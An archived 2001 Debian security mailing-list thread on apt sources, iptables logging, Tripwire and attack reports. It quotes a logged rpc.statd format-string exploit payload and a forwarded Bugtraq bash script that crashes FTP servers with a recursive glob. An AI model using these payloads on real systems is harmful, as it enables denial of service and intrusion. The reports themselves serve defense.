Re: configuring iptables logging
On Sat, Aug 18, 2001 at 04:59:28PM -0500, JonesMB wrote: Is it possible to get rid of the MAC address and the field that follows it. All I would like to see is the source and destination IP address and the information after it. I haven't been able to find any info on the net on how to do this. All I can think of is modifying the kernel (netfilter) source file but that doesn't seem like a good idea. Why don't you simply use cut -f-4,6- -d' ' logfile ? Sometimes the hardware address can be interesting. Cheers, Joerg -- \ Joerg Wendland \ systems / network administrator, ITSec, Scan Plus GmbH \ *joergland* \ Moerikestrasse 5, 89077 Ulm, Germany \\ fon +49-731-92013-21, fax +49-731-6027146 \\ PGP-key: finger [EMAIL PROTECTED] \ key fingerprint: 79C0 7671 AFC7 315E 657A F318 57A3 7FBD 51CF 8417 PGP signature
Re: apt sources.list
On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote: Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? Woody would be my last choice for a automagically secure installation: * it gets no packages of any kind that haven't been in unstable for 2 weeks with no release-critical bugs. Security fixes are not an exception to this rule. * most of the packages in security.debian.org have nearly identical versions to potato -- Debian tends not to upgrade versions to fix bugs, but instead backports patches into the current potato versions. This means that apt-get upgrade (or dist-upgrade) will tend to ignore security packages, since you'll already have a newer version installed. apt-get upgrade doesn't check dates, changelogs, or anything but the literal numeric version number. Running stable+security.debian.org is really the only *easy* solution, followed by running testing+(selected packages from unstable with security updates and probably other changes, too), and lastly by running fully unstable. Ok, those last two don't qualify as easy to me at all. For me, it's not even a question -- you want security, you run stable and keep security.debian.org in your sources.list. -- Mike Renfro / RD Engineer, Center for Manufacturing Research, 931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: apt sources.list
Mike Renfro, 2001-Aug-21 14:40 -0500: On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote: Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? Woody would be my last choice for a automagically secure installation: * it gets no packages of any kind that haven't been in unstable for 2 weeks with no release-critical bugs. Security fixes are not an exception to this rule. * most of the packages in security.debian.org have nearly identical versions to potato -- Debian tends not to upgrade versions to fix bugs, but instead backports patches into the current potato versions. This means that apt-get upgrade (or dist-upgrade) will tend to ignore security packages, since you'll already have a newer version installed. apt-get upgrade doesn't check dates, changelogs, or anything but the literal numeric version number. Running stable+security.debian.org is really the only *easy* solution, followed by running testing+(selected packages from unstable with security updates and probably other changes, too), and lastly by running fully unstable. Ok, those last two don't qualify as easy to me at all. For me, it's not even a question -- you want security, you run stable and keep security.debian.org in your sources.list. -- Mike Renfro / RD Engineer, Center for Manufacturing Research, 931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Thanks for this explanation. I see what you mean, if I want security updates. I feel a bit stuck with woody though, since I want to use iptables instead of ipchains. I think I'll remove the security source until I figure out a better way. thanks, jc -- Jeff CoppockNortel Networks Systems Engineerhttp://nortelnetworks.com Major Accts.Santa Clara, CA -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: rpc.statd being attacked?
I think this is an 800 year old Red Hat exploit, so probably no worries. No need to worry, but any rpc services are lousy to have running anyway. - k - Original Message - From: Daniel Schepler [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, August 21, 2001 4:28 PM Subject: rpc.statd being attacked? I've gotten logs several times that read something like Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7F F BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10 x%n% 192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20 (This is at least the way it reads in less.) For now I've just shut down the rpc.statd daemon, but I was wondering if this is a known attack. -- Daniel Schepler Please don't disillusion me. I [EMAIL PROTECTED]haven't had breakfast yet. -- Orson Scott Card -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: rpc.statd being attacked?
On Tue, Aug 21, 2001 at 01:28:24PM -0700, Daniel Schepler wrote: I've gotten logs several times that read something like Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FF BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n% You're safe. It was fixed before potato; it would not have been logged if it had succeeded. -- Daniel Jacobowitz Carnegie Mellon University MontaVista Software Debian GNU/Linux Developer -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: apt sources.list
On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote: Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? I recently did an apt-get update apt-get upgrade and the security updates cause dependancy issues that I couldn't recover from and made my system unbootable, since lilo was involved. I'm scared to death to run another update/upgrade since I had to rebuild the system from scratch! As others have said - don't do this :) If security is especially important to you, run stable with security updates, or track unstable daily and hope maintainers are responsive. We try to see that woody is in coherent shape just before release, but we can't supply fixes for it on any more urgent basis. It moves too fast. -- Daniel Jacobowitz Carnegie Mellon University MontaVista Software Debian GNU/Linux Developer -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: configuring iptables logging
On Sat, Aug 18, 2001 at 04:59:28PM -0500, JonesMB wrote: Is it possible to get rid of the MAC address and the field that follows it. All I would like to see is the source and destination IP address and the information after it. I haven't been able to find any info on the net on how to do this. All I can think of is modifying the kernel (netfilter) source file but that doesn't seem like a good idea. Why don't you simply use cut -f-4,6- -d' ' logfile ? Sometimes the hardware address can be interesting. Cheers, Joerg -- \ Joerg Wendland \ systems / network administrator, ITSec, Scan Plus GmbH \ *joergland* \ Moerikestrasse 5, 89077 Ulm, Germany \\ fon +49-731-92013-21, fax +49-731-6027146 \\ PGP-key: finger [EMAIL PROTECTED] \ key fingerprint: 79C0 7671 AFC7 315E 657A F318 57A3 7FBD 51CF 8417 pgpUPtdBd7ao2.pgp Description: PGP signature
FHS + Debian Tripwire policy file
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I am in the process of designing a Tripwire 2.3 policy file that is based on the FHS plus annexes for GNU/Linux and Debian's distribution of it. I don't like the current policy file which is just a list of all of the Debian Important-level package files - it complains too much about missing files when one does not have a standard setup and it is really too detailed (= long to read) in the wrong places. In addition, it does not check some Debian-specific stuff like the contents of /var/lib/dpkg. My goal is that the system will be sufficiently modular that one can just patch in a few tiny distribution-specific changes and have a nice policy for any FHS-compliant system. I am trying to limit references to individual files to the absolute minimum and instead address whole directories at a time. Hopefully, this will result is a shorter, yet more thorough policy that never causes a complaint except when there has been a real unauthorised change. Eventually I also plan to write a script that will automatically check off files that have been changed by dpkg and reported by Tripwire, perhaps using md5sum info from the .debs. Before I get too far, I would like to ask the question: is anyone is working on a similar project? Perhaps for aide or another IDS? I've done some Google searches for FHS and Tripwire, but except for a few off-hand remarks, it seems that noone is working on this idea. Erik Rossen ^GPG key ID: 2935D0B9 [EMAIL PROTECTED] /e\ Use GnuPG, see the http://www.multimania.com/rossen ---black helicopters. -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE7gi+jY88aPik10LkRAiBEAKDVJJ28JRs9vU+d/LQKMyFru4dRCACdFcyR muveSPk58ya0khe4tPpr6UI= =Dx2o -END PGP SIGNATURE-
apt sources.list
Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? I recently did an apt-get update apt-get upgrade and the security updates cause dependancy issues that I couldn't recover from and made my system unbootable, since lilo was involved. I'm scared to death to run another update/upgrade since I had to rebuild the system from scratch! thanks, jc -- Jeff CoppockNortel Networks Systems Engineerhttp://nortelnetworks.com Major Accts.Santa Clara, CA
Re: apt sources.list
* Jeff Coppock [EMAIL PROTECTED] spake thus: Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? I recently did an apt-get update apt-get upgrade and the security updates cause dependancy issues that I couldn't recover from and made my system unbootable, since lilo was involved. I'm scared to death to run another update/upgrade since I had to rebuild the system from scratch! I think that running dist-upgrade instead of merely upgrade will be a good idea with woody/sid. I am not sure that it may have caused your trouble however, there are probably more knowledgable people on the list that can answer that though. Regards, Stig -- www.brautaset.org
Re: apt sources.list
On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote: Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? Woody would be my last choice for a automagically secure installation: * it gets no packages of any kind that haven't been in unstable for 2 weeks with no release-critical bugs. Security fixes are not an exception to this rule. * most of the packages in security.debian.org have nearly identical versions to potato -- Debian tends not to upgrade versions to fix bugs, but instead backports patches into the current potato versions. This means that apt-get upgrade (or dist-upgrade) will tend to ignore security packages, since you'll already have a newer version installed. apt-get upgrade doesn't check dates, changelogs, or anything but the literal numeric version number. Running stable+security.debian.org is really the only *easy* solution, followed by running testing+(selected packages from unstable with security updates and probably other changes, too), and lastly by running fully unstable. Ok, those last two don't qualify as easy to me at all. For me, it's not even a question -- you want security, you run stable and keep security.debian.org in your sources.list. -- Mike Renfro / RD Engineer, Center for Manufacturing Research, 931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED]
Re: apt sources.list
Mike Renfro, 2001-Aug-21 14:40 -0500: On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote: Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? Woody would be my last choice for a automagically secure installation: * it gets no packages of any kind that haven't been in unstable for 2 weeks with no release-critical bugs. Security fixes are not an exception to this rule. * most of the packages in security.debian.org have nearly identical versions to potato -- Debian tends not to upgrade versions to fix bugs, but instead backports patches into the current potato versions. This means that apt-get upgrade (or dist-upgrade) will tend to ignore security packages, since you'll already have a newer version installed. apt-get upgrade doesn't check dates, changelogs, or anything but the literal numeric version number. Running stable+security.debian.org is really the only *easy* solution, followed by running testing+(selected packages from unstable with security updates and probably other changes, too), and lastly by running fully unstable. Ok, those last two don't qualify as easy to me at all. For me, it's not even a question -- you want security, you run stable and keep security.debian.org in your sources.list. -- Mike Renfro / RD Engineer, Center for Manufacturing Research, 931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Thanks for this explanation. I see what you mean, if I want security updates. I feel a bit stuck with woody though, since I want to use iptables instead of ipchains. I think I'll remove the security source until I figure out a better way. thanks, jc -- Jeff CoppockNortel Networks Systems Engineerhttp://nortelnetworks.com Major Accts.Santa Clara, CA
rpc.statd being attacked?
I've gotten logs several times that read something like Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FF BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n% 192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 (This is at least the way it reads in less.) For now I've just shut down the rpc.statd daemon, but I was wondering if this is a known attack. -- Daniel Schepler Please don't disillusion me. I [EMAIL PROTECTED]haven't had breakfast yet. -- Orson Scott Card
Re: apt sources.list
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jeff == Jeff Coppock [EMAIL PROTECTED] writes: JeffI feel a bit stuck with woody though, since I want to use Jeff iptables instead of ipchains. I think I'll remove the security Jeff source until I figure out a better way. Adrian Bunk has all that you need for kernel 2.4.x on Potato (including iptables): http://people.debian.org/~bunk/debian/dists/potato/main/binary-i386/ - -- Hubert Chan [EMAIL PROTECTED] - http://www.geocities.com/hubertchan/ PGP/GnuPG key: 1024D/651854DF71FDA37F Fingerprint: 6CC5 822D 2E55 494C 81DD 6F2C 6518 54DF 71FD A37F Key available at wwwkeys.pgp.net. Please encrypt *all* e-mail to me. -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE7gsjiZRhU33H9o38RAjeKAKC8L8mOFBJ/QzKG/iMUpHJr5M4HLwCg05EI hjb88wvLOLp4O9eObhX+uV4= =pBxt -END PGP SIGNATURE-
Re: apt sources.list
At 01:24 PM 8/21/2001 -0700, Jeff Coppock wrote: Mike Renfro, 2001-Aug-21 14:40 -0500: On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote: Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? Woody would be my last choice for a automagically secure installation: Thanks for this explanation. I see what you mean, if I want security updates. I feel a bit stuck with woody though, since I want to use iptables instead of ipchains. I think I'll remove the security source until I figure out a better way. If you want to use IPTables, simply upgrade your kernel. ftp.kernel.org and schlurp down the linux-v2.4.x of your choice (I'm using 2.4.6 right now). Then apt-get install iptables and you're set. -- Eric N. Valor Webmeister/Inetservices Lutris Technologies [EMAIL PROTECTED] - This Space Intentionally Left Blank -
Re: apt sources.list
Greetings, A better solution might be to install Potato, then recompile the src debs from woody for the few packages that you actually need. G'day, sjames Quoting Jeff Coppock [EMAIL PROTECTED]: Mike Renfro, 2001-Aug-21 14:40 -0500: On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote: Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? Woody would be my last choice for a automagically secure installation: * it gets no packages of any kind that haven't been in unstable for 2 weeks with no release-critical bugs. Security fixes are not an exception to this rule. * most of the packages in security.debian.org have nearly identical versions to potato -- Debian tends not to upgrade versions to fix bugs, but instead backports patches into the current potato versions. This means that apt-get upgrade (or dist-upgrade) will tend to ignore security packages, since you'll already have a newer version installed. apt-get upgrade doesn't check dates, changelogs, or anything but the literal numeric version number. Running stable+security.debian.org is really the only *easy* solution, followed by running testing+(selected packages from unstable with security updates and probably other changes, too), and lastly by running fully unstable. Ok, those last two don't qualify as easy to me at all. For me, it's not even a question -- you want security, you run stable and keep security.debian.org in your sources.list. -- Mike Renfro / RD Engineer, Center for Manufacturing Research, 931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Thanks for this explanation. I see what you mean, if I want security updates. I feel a bit stuck with woody though, since I want to use iptables instead of ipchains. I think I'll remove the security source until I figure out a better way. thanks, jc -- Jeff Coppock Nortel Networks Systems Engineer http://nortelnetworks.com Major Accts. Santa Clara, CA -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -steven james, director of research, linux labs LinuxBIOS Cluster Solutions 230 peachtree st nw ste 701 High-Speed Colocation, Hosting, atlanta.ga.us 30303 Web Design, Linux Hardware,http://www.linuxlabs.com Development Support Since 1995 404.577.7747 fax 404.577.7743 ---
Re: rpc.statd being attacked?
I think this is an 800 year old Red Hat exploit, so probably no worries. No need to worry, but any rpc services are lousy to have running anyway. - k - Original Message - From: Daniel Schepler [EMAIL PROTECTED] To: debian-security@lists.debian.org Sent: Tuesday, August 21, 2001 4:28 PM Subject: rpc.statd being attacked? I've gotten logs several times that read something like Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7F F BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10 x%n% 192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20 (This is at least the way it reads in less.) For now I've just shut down the rpc.statd daemon, but I was wondering if this is a known attack. -- Daniel Schepler Please don't disillusion me. I [EMAIL PROTECTED]haven't had breakfast yet. -- Orson Scott Card -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)
I'm using proftpd 1.2.0pre10-2.0potato1, tried this vulnerability, and still affects to this version of proftpd. I see that ftp://ftp.debian.org is still using this version, and I think also affected. Thanks Didit --- Start of forwarded message --- From: Enrico Kern [EMAIL PROTECTED] To: bugtraq@securityfocus.com Organization: http://freemail.web.de/ Subject: Multiple-Vendor-FTP-Vuln. (old?) Date: 8/20/01 20:20:35 Hi, i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = many new Linux-Dist.. When a user logged in in ftp and type the ls command the in.ftpd takes over 90 percent cpu-usage and execute = the command 2 or 3x than the full system hang up. it also works in = console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ = in march 01, but it still works so i post it again. affected: RedHat Linux 7.x Linux Mandrake 8.0 SuSE Linux 7.2 FreeBSD 4.3 AiX V 4.3 other? Not vuln.: latest Wu-Ftpd Windows FTP-Server Exploit: #!/bin/bash=20 ftp -n FTP-SERVER\end=20 quot user anonymous bin quot pass [EMAIL PROTECTED] ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* bye=20 end=20 Fix: set cpu-limit for your anonymous user. End of forwarded message
Re: rpc.statd being attacked?
On Tue, Aug 21, 2001 at 01:28:24PM -0700, Daniel Schepler wrote: I've gotten logs several times that read something like Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FF BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n% You're safe. It was fixed before potato; it would not have been logged if it had succeeded. -- Daniel Jacobowitz Carnegie Mellon University MontaVista Software Debian GNU/Linux Developer
Re: apt sources.list
On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote: Can I get a few recommendations on the proper sources.list for a system running woody, that includes the security updates? I recently did an apt-get update apt-get upgrade and the security updates cause dependancy issues that I couldn't recover from and made my system unbootable, since lilo was involved. I'm scared to death to run another update/upgrade since I had to rebuild the system from scratch! As others have said - don't do this :) If security is especially important to you, run stable with security updates, or track unstable daily and hope maintainers are responsive. We try to see that woody is in coherent shape just before release, but we can't supply fixes for it on any more urgent basis. It moves too fast. -- Daniel Jacobowitz Carnegie Mellon University MontaVista Software Debian GNU/Linux Developer
